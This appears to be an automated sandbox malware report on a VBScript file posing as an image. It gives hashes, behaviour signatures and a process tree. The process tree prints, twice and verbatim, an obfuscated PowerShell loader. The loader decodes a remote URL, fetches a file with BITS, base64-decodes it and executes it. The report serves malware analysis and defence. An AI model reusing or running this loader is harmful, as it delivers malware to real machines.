Resubmissions

11-12-2023 17:03

231211-vk7zhsecb2 10

11-12-2023 09:42

231211-lpcvhacef5 10

Analysis

  • max time kernel
    89s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231130-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-12-2023 09:42

General

  • Target

    DH-087481 IMG.vbe

  • Size

    81KB

  • MD5

    b0e1835d06d4ae28eb1e1cee627360ea

  • SHA1

    31c82a2038f281fcc43377706d00c79c1d07bcee

  • SHA256

    34f4d416f700e77ef730f4ee4207218e7a3f978fc40efd8b7a399d58113d26b5

  • SHA512

    506479a1dd46f52000a175b779c1882610e432bfa4341ce0e4eaca975b9cc7f1ae45618bd68cfe934484e2347c2f9cb070c6e8b0c01938134a7fa7047a1c23df

  • SSDEEP

    1536:vZL/8DxkbzqcfC+bxucaTm1oF65imB6WgF8/SEcLuwI4u7293H:Br8DxMzpf5xuha1oFuiG6hyKJpI4uy93

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DH-087481 IMG.vbe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function scrophularia9 ($pollyannish){$Exallotriotebenholtsfljten = $pollyannish.Length-1; For ($Exallotriote=6; $Exallotriote -lt $Exallotriotebenholtsfljten){$Svmmeblre=$Svmmeblre+$pollyannish.Substring( $Exallotriote, 1);$Exallotriote+=7;}$Svmmeblre;}$Oinologies=scrophularia9 'Fluoroh KindetFestlit PunktpGrnsef:perenn/Benytt/EngluerPindsva Ligkac Letmak UnroboDowereoSeriernKabelt.SharpsnPotoroeNonenetDitchb/InternwBlaaalpCister-SickweiHuldsaninfantcElektrlBrombeuBrilladMetameeBehandsEksami/PreconfLukkeloTightfnEconomt Fredss Rewea/explosMMedalli ChantlGlendajcardiom DreadiAnkerpnUnanimiTillitsSabotetPensive Nakitr hayrai RakinuCpddkemBluenesscliff.NonrevmBrandssroperio Kiefo ';$Svmmeblre01=scrophularia9 'VoldsfiSkammeeHukommxPolyto ';$Uncontemporaneously = scrophularia9 'Brudne\meetabs DepriyVajinhs AssocwPrdispoBeridewTracer6 Payni4Hoseur\IngensWSemiauidaintinTinajadhunknsoRowellwMilionsBesiddPforbasosukkerwHabdalemechanranklagS fulfihTidsaleSporoslBirdsol Psych\BrolggvTranvi1Raagum.Chamoi0Hondur\UdmntepagtersoMikroswLaridseKonomirUnenras HumanhIldeseeBrystpl BjerglWordis.MoniedeSymaskxAdgangeFinoch ';. ($Svmmeblre01) (scrophularia9 ' Phyll$ NoncaMHemocyoGomutitBroadaotonguerwhencebGlatbaaBackcaaStatssdJuleka2Skatte=Isoque$AntiopeCirrocnEmphatvLimone:DefuzewdiagoniMattedntidiesdSwashei HoffmrHjemvi ') ;. ($Svmmeblre01) (scrophularia9 'Indkom$CranehUAvocadnAutonocCircumoFjortenTungmetKolonie RessamArchonpBagstroMedbrirUtaalmarecitenBuggyaeBevaeboNukleauByguersPolygolUnprivy Indpr=Gyrati$DjalmaMFurtheoDiscustAutodioOxidisrSkrmdibUgelnna Helika UnpoedKonsul2noncur+Dogmat$lydlseUIntrafnRosenscchromooRvetornTurriftDurabieVrgedem EmprepKlkkero PreclrCibolzaAchroinIdeoloeTingfaoArbejdustraalsMenololLinettyPropar ') ;& ($Svmmeblre01) (scrophularia9 'Opgave$OverciOCalyxedLysteleInvasisOstiae Gangl=Tapper Faunol(Maatte(XylofogFagklawBlokkam AbsceiLokali KapselwTilspiiRikardnReenco3Talles2netvin_Obsessp extrar TordeoFetialcCleavee BurglsBrattesIndust Cityf-PletteFStratu UnshakPOptatirPartioo Fodtuc MlkeheStormasRuslansStemmeISassagdAbranc= Misvi$Preppi{CarlylPDetermI DrapeD Ortho}Unbust)Tunghr.KidnapC Wieldo IkrafmSmagsamFngsela GtemanLegerid AandsLBrumbaiKilobinGarnise Levne)Demetr Intral-HeraclsTransppStatselPrioriiInconst Anstt Ideol[AlderscResonehTopforafstemnrPropod]rrende3Gttevr4Sclero ');& ($Svmmeblre01) (scrophularia9 ' kbsla$KoncerVeternai GladynPremodtSrgesae Vaughr brach Cathea=Sprogb Brndeo$TautolOTimetadStrelieBegoalsForeth[Myoper$TumoroOForhaldBerrineFrowsmsPoliti.excentcNonrecoPholiduFlervenOffenttSteved- Inter2Coturn]Eiasor ');& ($Svmmeblre01) (scrophularia9 'Oxychl$VertebNAllocha JudictjacamauPrposirGruesoe StraflBerigns StatskCardioeInfurirDegenenStenogeRepert=Optima(QuantaTNaelkaeCountes CounttSmeeky-KnsdelPMorinaahumourtRatstrhDiverg cellu$ApotekUCinnalnParadoc ArbejoTyndtan MarketAppoineRhesusmCovetaphusmodoJudsonrStedfdaMerribn HvnineEmissio BevisuAggressPoultslHeiintyKitsch) Hensl Under-FlapdrA smigenNonherd Mutil Copybo(Shpteo[ChristI GuttunBetragt ClarePIndustt uncrirSnuppe]outhea:Skttea: SkppesExopteiTrosbezPolemieFransk Folke- NonapeInvertqupheal Drosch8Klitpl)Underk ') ;if ($Naturelskerne) {& $Uncontemporaneously $Vinter;} else {;$Svmmeblre00=scrophularia9 'HypidiSEncamptSmidigaAvengerextemptAccele-CodlinB PachyiVkkeretSpectrsFjteraT Mejetr Jobbea EkshinTurgois WyoutfDyrplaeEksekurQueeni Vasil- TeatrSInsertoYohimbu SprngrAgterucUbeboeelukker Fuske$ AcharOJordoniferritnConcepogoatmal Somnio Uvejrg Stenfitilsige vildtsRekind Readie-TordenDEfterle motorsStrafpt MiddeirumpernNonconaAfgangtEtaersiDissekoFaktornLaanef Ebcasc$ForkorM SelvfoOvergatHyndesoPhilomrGuestib PerniabemandaInvulndFrimur2Misact ';& ($Svmmeblre01) (scrophularia9 ' Editr$ HavfrMinsignoMusikttSuleimomadamdrMistrabFibrouaAdenovaSystemdRetrot2Infice=Pseudo$ Forbie TrawanHypogyvRegnes:Choltra Bodemp GratipBladnidtournaaSteddatUnoffea Dekin ') ;& ($Svmmeblre01) (scrophularia9 'GstgivI Gabbim autaxp AmortoriantsrKulturtNagelf-FlorerMBiconcoNonpardBlotteuBundsklGaestfeNonocc UncrowBSelektiBjernetFinanssMonarcT PrivarUnconcaSubumbnAfrusts validfUdsugeeChalinrOmsorg ') ;$Motorbaad2=$Motorbaad2+'\Burnsian.Ena';while (-not $Luxemburgsk) {. ($Svmmeblre01) (scrophularia9 'Chymou$JajmanLunavnguUnvextxHertugeValfarmFennerb SaprouUtilstr Odgergmartins Leverkskyldn=simult(ModellTCoddinetvrstrs CrambtNezita-ReginaPCompena LepidtUnservhfilari Asylby$ UphasM Evindo RomantTidsruoBombesrInherebTvangsaSufficaBallondMultic2Rosett)Antior ') ;.($Svmmeblre01) $Svmmeblre00;.($Svmmeblre01) (scrophularia9 'PyretoSWithert tillbaTebirkr Syvaat anega-NedskrSHypophltredjeePrepsleLavpripChawks Meowed5 Flisk ');}& ($Svmmeblre01) (scrophularia9 'plutok$NedskasgeneracAnstaarBramraoOutroappockethSemicouFritzelEnnoblaUnglidrUnborridiluteaDestin iscrem= terep DennovGDesecre FjendtBudbri- galteCGldspooBurresnklemhatMeldereParallnChuzwitTilsyn Tingen$BallgoMMiroscoOutseat LinjeoWoodnyrTermitbBortkoaKotelea TestudGreenh2imprgn ');&($Svmmeblre01) (scrophularia9 'Betwat$PlacemGgavstruPistoliIldtorlUnderkl DockieTonguemAflbsr Womani= thurs Cancer[CnicusSHvsedeyKalveksNisrestEmbarqeTillavm Petit.DuetteCTerninoOsteotnHelgemv Diskfe SadomrTotalbtEnribo]infame:Stopve:WanganFgarryarImmindoProtodmFldeosBForsvaa GrundsLedsageFiduse6 Schiz4amplifS TestitVenstrrForporiEliminnDapichgStreng(Starva$HexatesAvisovcSdekorr SkjoroSwallopsceuophRatifiu GentilRespekaReskndr Obambi TobauaProxim) Proce ');. ($Svmmeblre01) (scrophularia9 'Widesg$OveratSGalionvRusinemKatalymHissedeKvartsbArtilllValgtyrBttefuePlemoc2Prevos Isoval=Denise Rumfan[ CrystSUtryggyLightesSlbernt MarineSaprogmUlvefo.RecensTKoncene Ggepuxaustrit endev.KsnehaERegistnregistcGobiifo BrydndLilleti Opregneffundg Sport]Vildtr: Naboi:FactorABlodigSBirgitCKrigsuIPitikiI Ufork.MaxilnG Glucoe PainttBrugerS Intert ReorgrFarvepi KnortnunprefgKirkeg(fluvic$EgentlGPrunesuKnebleiJudgmelPensiolOverfaeAnraabmDiurnu)Termog ');. ($Svmmeblre01) (scrophularia9 ' Indek$ VansiP DevilhVeddanl Betroo BuddhrForfalhFormyliUnsaliz PateniBehandnRdmebu=Fakute$ AmoriSMesocavHousehmVirtuomKorsfseForledbVandrelRedbairDelelie Oblig2Sonder.Knugeds PaadruGarageb NydelsSignalt Waterr Ishtai FecunnTotallgBrides(Billyg2Scudde9Candmu9Fintma6Ocypet7Interl1 Unmag,Cipher2Forblf6nonpen0 Hjemm0Beerma5Trisul)Fierce ');. ($Svmmeblre01) $Phlorhizin;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:440
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function scrophularia9 ($pollyannish){$Exallotriotebenholtsfljten = $pollyannish.Length-1; For ($Exallotriote=6; $Exallotriote -lt $Exallotriotebenholtsfljten){$Svmmeblre=$Svmmeblre+$pollyannish.Substring( $Exallotriote, 1);$Exallotriote+=7;}$Svmmeblre;}$Oinologies=scrophularia9 'Fluoroh KindetFestlit PunktpGrnsef:perenn/Benytt/EngluerPindsva Ligkac Letmak UnroboDowereoSeriernKabelt.SharpsnPotoroeNonenetDitchb/InternwBlaaalpCister-SickweiHuldsaninfantcElektrlBrombeuBrilladMetameeBehandsEksami/PreconfLukkeloTightfnEconomt Fredss Rewea/explosMMedalli ChantlGlendajcardiom DreadiAnkerpnUnanimiTillitsSabotetPensive Nakitr hayrai RakinuCpddkemBluenesscliff.NonrevmBrandssroperio Kiefo ';$Svmmeblre01=scrophularia9 'VoldsfiSkammeeHukommxPolyto ';$Uncontemporaneously = scrophularia9 'Brudne\meetabs DepriyVajinhs AssocwPrdispoBeridewTracer6 Payni4Hoseur\IngensWSemiauidaintinTinajadhunknsoRowellwMilionsBesiddPforbasosukkerwHabdalemechanranklagS fulfihTidsaleSporoslBirdsol Psych\BrolggvTranvi1Raagum.Chamoi0Hondur\UdmntepagtersoMikroswLaridseKonomirUnenras HumanhIldeseeBrystpl BjerglWordis.MoniedeSymaskxAdgangeFinoch ';. ($Svmmeblre01) (scrophularia9 ' Phyll$ NoncaMHemocyoGomutitBroadaotonguerwhencebGlatbaaBackcaaStatssdJuleka2Skatte=Isoque$AntiopeCirrocnEmphatvLimone:DefuzewdiagoniMattedntidiesdSwashei HoffmrHjemvi ') ;. ($Svmmeblre01) (scrophularia9 'Indkom$CranehUAvocadnAutonocCircumoFjortenTungmetKolonie RessamArchonpBagstroMedbrirUtaalmarecitenBuggyaeBevaeboNukleauByguersPolygolUnprivy Indpr=Gyrati$DjalmaMFurtheoDiscustAutodioOxidisrSkrmdibUgelnna Helika UnpoedKonsul2noncur+Dogmat$lydlseUIntrafnRosenscchromooRvetornTurriftDurabieVrgedem EmprepKlkkero PreclrCibolzaAchroinIdeoloeTingfaoArbejdustraalsMenololLinettyPropar ') ;& ($Svmmeblre01) (scrophularia9 'Opgave$OverciOCalyxedLysteleInvasisOstiae Gangl=Tapper Faunol(Maatte(XylofogFagklawBlokkam AbsceiLokali KapselwTilspiiRikardnReenco3Talles2netvin_Obsessp extrar TordeoFetialcCleavee BurglsBrattesIndust Cityf-PletteFStratu UnshakPOptatirPartioo Fodtuc MlkeheStormasRuslansStemmeISassagdAbranc= Misvi$Preppi{CarlylPDetermI DrapeD Ortho}Unbust)Tunghr.KidnapC Wieldo IkrafmSmagsamFngsela GtemanLegerid AandsLBrumbaiKilobinGarnise Levne)Demetr Intral-HeraclsTransppStatselPrioriiInconst Anstt Ideol[AlderscResonehTopforafstemnrPropod]rrende3Gttevr4Sclero ');& ($Svmmeblre01) (scrophularia9 ' kbsla$KoncerVeternai GladynPremodtSrgesae Vaughr brach Cathea=Sprogb Brndeo$TautolOTimetadStrelieBegoalsForeth[Myoper$TumoroOForhaldBerrineFrowsmsPoliti.excentcNonrecoPholiduFlervenOffenttSteved- Inter2Coturn]Eiasor ');& ($Svmmeblre01) (scrophularia9 'Oxychl$VertebNAllocha JudictjacamauPrposirGruesoe StraflBerigns StatskCardioeInfurirDegenenStenogeRepert=Optima(QuantaTNaelkaeCountes CounttSmeeky-KnsdelPMorinaahumourtRatstrhDiverg cellu$ApotekUCinnalnParadoc ArbejoTyndtan MarketAppoineRhesusmCovetaphusmodoJudsonrStedfdaMerribn HvnineEmissio BevisuAggressPoultslHeiintyKitsch) Hensl Under-FlapdrA smigenNonherd Mutil Copybo(Shpteo[ChristI GuttunBetragt ClarePIndustt uncrirSnuppe]outhea:Skttea: SkppesExopteiTrosbezPolemieFransk Folke- NonapeInvertqupheal Drosch8Klitpl)Underk ') ;if ($Naturelskerne) {& $Uncontemporaneously $Vinter;} else {;$Svmmeblre00=scrophularia9 'HypidiSEncamptSmidigaAvengerextemptAccele-CodlinB PachyiVkkeretSpectrsFjteraT Mejetr Jobbea EkshinTurgois WyoutfDyrplaeEksekurQueeni Vasil- TeatrSInsertoYohimbu SprngrAgterucUbeboeelukker Fuske$ AcharOJordoniferritnConcepogoatmal Somnio Uvejrg Stenfitilsige vildtsRekind Readie-TordenDEfterle motorsStrafpt MiddeirumpernNonconaAfgangtEtaersiDissekoFaktornLaanef Ebcasc$ForkorM SelvfoOvergatHyndesoPhilomrGuestib PerniabemandaInvulndFrimur2Misact ';& ($Svmmeblre01) (scrophularia9 ' Editr$ HavfrMinsignoMusikttSuleimomadamdrMistrabFibrouaAdenovaSystemdRetrot2Infice=Pseudo$ Forbie TrawanHypogyvRegnes:Choltra Bodemp GratipBladnidtournaaSteddatUnoffea Dekin ') ;& ($Svmmeblre01) (scrophularia9 'GstgivI Gabbim autaxp AmortoriantsrKulturtNagelf-FlorerMBiconcoNonpardBlotteuBundsklGaestfeNonocc UncrowBSelektiBjernetFinanssMonarcT PrivarUnconcaSubumbnAfrusts validfUdsugeeChalinrOmsorg ') ;$Motorbaad2=$Motorbaad2+'\Burnsian.Ena';while (-not $Luxemburgsk) {. ($Svmmeblre01) (scrophularia9 'Chymou$JajmanLunavnguUnvextxHertugeValfarmFennerb SaprouUtilstr Odgergmartins Leverkskyldn=simult(ModellTCoddinetvrstrs CrambtNezita-ReginaPCompena LepidtUnservhfilari Asylby$ UphasM Evindo RomantTidsruoBombesrInherebTvangsaSufficaBallondMultic2Rosett)Antior ') ;.($Svmmeblre01) $Svmmeblre00;.($Svmmeblre01) (scrophularia9 'PyretoSWithert tillbaTebirkr Syvaat anega-NedskrSHypophltredjeePrepsleLavpripChawks Meowed5 Flisk ');}& ($Svmmeblre01) (scrophularia9 'plutok$NedskasgeneracAnstaarBramraoOutroappockethSemicouFritzelEnnoblaUnglidrUnborridiluteaDestin iscrem= terep DennovGDesecre FjendtBudbri- galteCGldspooBurresnklemhatMeldereParallnChuzwitTilsyn Tingen$BallgoMMiroscoOutseat LinjeoWoodnyrTermitbBortkoaKotelea TestudGreenh2imprgn ');&($Svmmeblre01) (scrophularia9 'Betwat$PlacemGgavstruPistoliIldtorlUnderkl DockieTonguemAflbsr Womani= thurs Cancer[CnicusSHvsedeyKalveksNisrestEmbarqeTillavm Petit.DuetteCTerninoOsteotnHelgemv Diskfe SadomrTotalbtEnribo]infame:Stopve:WanganFgarryarImmindoProtodmFldeosBForsvaa GrundsLedsageFiduse6 Schiz4amplifS TestitVenstrrForporiEliminnDapichgStreng(Starva$HexatesAvisovcSdekorr SkjoroSwallopsceuophRatifiu GentilRespekaReskndr Obambi TobauaProxim) Proce ');. ($Svmmeblre01) (scrophularia9 'Widesg$OveratSGalionvRusinemKatalymHissedeKvartsbArtilllValgtyrBttefuePlemoc2Prevos Isoval=Denise Rumfan[ CrystSUtryggyLightesSlbernt MarineSaprogmUlvefo.RecensTKoncene Ggepuxaustrit endev.KsnehaERegistnregistcGobiifo BrydndLilleti Opregneffundg Sport]Vildtr: Naboi:FactorABlodigSBirgitCKrigsuIPitikiI Ufork.MaxilnG Glucoe PainttBrugerS Intert ReorgrFarvepi KnortnunprefgKirkeg(fluvic$EgentlGPrunesuKnebleiJudgmelPensiolOverfaeAnraabmDiurnu)Termog ');. ($Svmmeblre01) (scrophularia9 ' Indek$ VansiP DevilhVeddanl Betroo BuddhrForfalhFormyliUnsaliz PateniBehandnRdmebu=Fakute$ AmoriSMesocavHousehmVirtuomKorsfseForledbVandrelRedbairDelelie Oblig2Sonder.Knugeds PaadruGarageb NydelsSignalt Waterr Ishtai FecunnTotallgBrides(Billyg2Scudde9Candmu9Fintma6Ocypet7Interl1 Unmag,Cipher2Forblf6nonpen0 Hjemm0Beerma5Trisul)Fierce ');. ($Svmmeblre01) $Phlorhizin;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4944
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 2648
          4⤵
          • Program crash
          PID:2464
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4944 -ip 4944
    1⤵
      PID:3300

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wuer11cy.034.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/440-0-0x0000018DF4830000-0x0000018DF4852000-memory.dmp

      Filesize

      136KB

    • memory/440-10-0x00007FF83B5B0000-0x00007FF83C071000-memory.dmp

      Filesize

      10.8MB

    • memory/440-12-0x0000018DF4870000-0x0000018DF4880000-memory.dmp

      Filesize

      64KB

    • memory/440-11-0x0000018DF4870000-0x0000018DF4880000-memory.dmp

      Filesize

      64KB

    • memory/440-13-0x0000018DF4870000-0x0000018DF4880000-memory.dmp

      Filesize

      64KB

    • memory/440-43-0x00007FF83B5B0000-0x00007FF83C071000-memory.dmp

      Filesize

      10.8MB

    • memory/4944-20-0x0000000005730000-0x0000000005796000-memory.dmp

      Filesize

      408KB

    • memory/4944-33-0x00000000076E0000-0x0000000007D5A000-memory.dmp

      Filesize

      6.5MB

    • memory/4944-16-0x0000000004AC0000-0x0000000004AD0000-memory.dmp

      Filesize

      64KB

    • memory/4944-18-0x0000000004F70000-0x0000000004F92000-memory.dmp

      Filesize

      136KB

    • memory/4944-19-0x0000000005010000-0x0000000005076000-memory.dmp

      Filesize

      408KB

    • memory/4944-14-0x0000000002520000-0x0000000002556000-memory.dmp

      Filesize

      216KB

    • memory/4944-30-0x0000000005820000-0x0000000005B74000-memory.dmp

      Filesize

      3.3MB

    • memory/4944-31-0x0000000005E30000-0x0000000005E4E000-memory.dmp

      Filesize

      120KB

    • memory/4944-32-0x0000000005E70000-0x0000000005EBC000-memory.dmp

      Filesize

      304KB

    • memory/4944-17-0x0000000005100000-0x0000000005728000-memory.dmp

      Filesize

      6.2MB

    • memory/4944-34-0x00000000063E0000-0x00000000063FA000-memory.dmp

      Filesize

      104KB

    • memory/4944-36-0x0000000006470000-0x0000000006492000-memory.dmp

      Filesize

      136KB

    • memory/4944-35-0x0000000007100000-0x0000000007196000-memory.dmp

      Filesize

      600KB

    • memory/4944-37-0x0000000008310000-0x00000000088B4000-memory.dmp

      Filesize

      5.6MB

    • memory/4944-38-0x0000000007410000-0x0000000007432000-memory.dmp

      Filesize

      136KB

    • memory/4944-39-0x0000000007490000-0x00000000074A4000-memory.dmp

      Filesize

      80KB

    • memory/4944-40-0x00000000745C0000-0x0000000074D70000-memory.dmp

      Filesize

      7.7MB

    • memory/4944-15-0x00000000745C0000-0x0000000074D70000-memory.dmp

      Filesize

      7.7MB